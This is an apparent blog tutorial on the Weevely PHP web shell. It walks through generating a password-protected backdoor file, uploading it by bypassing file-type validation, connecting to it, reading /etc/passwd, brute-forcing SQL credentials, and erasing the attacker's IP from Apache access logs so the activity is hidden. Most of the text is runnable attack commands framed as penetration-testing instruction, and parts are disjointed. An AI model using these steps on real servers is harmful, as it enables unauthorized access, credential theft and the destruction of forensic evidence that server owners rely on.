Weevely tutorial: from basic to advance PHP web shell
Weevely is a webshell management tool written in python. Weevely tutorial article describes from basic to advance its most function on your penetration testing. Weevely is available on Kali Linux.
Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation, and network lateral movement, even in the restricted environment.
- Ssh-like terminal
- SQL console pivoted on target
- HTTP proxy pivoted on target
- Host configuration security auditing
- Mount of the remote filesystem
- Network scan pivoted on target
- File upload and download
- Reverse and direct TCP shell
- Meterpreter support
- Service account bruteforce
- Compressed archive management
Let’s start WEEVELY TUTORIAL
root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev
Generate a backdoor
root@ddos:~# weevely generate ddos ddos.php
Generated backdoor with password ‘ddos’ in ‘ddos.php’ of 1439 byte size.
bd core ddos.php modules utils weevely.py
You need to use some technique for uploading webshell like double extension, bypass image type validation, bypass whitelist/blacklist. View here.
Connect to the backdoor
root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Guess the SQL user credentials
This tip teaches you how to guess the credentials of multiple SQL users.
weevely> bruteforce_sql –help
This skill to teach you how to clear the server in the tracking records.
We use the system_info command to find our own ip
www-data@ddos:/var/log $ system_info -info client_ip
We use the grep command to confirm that our ip records in the log file
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
we can see that the activities of our IP address have been recorded, we can again use grep to remove our log from the ip, and then save it to a temporary file
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
Let’s test to see if we’ve deleted it
Then we can replace cleaned.log to access.log.1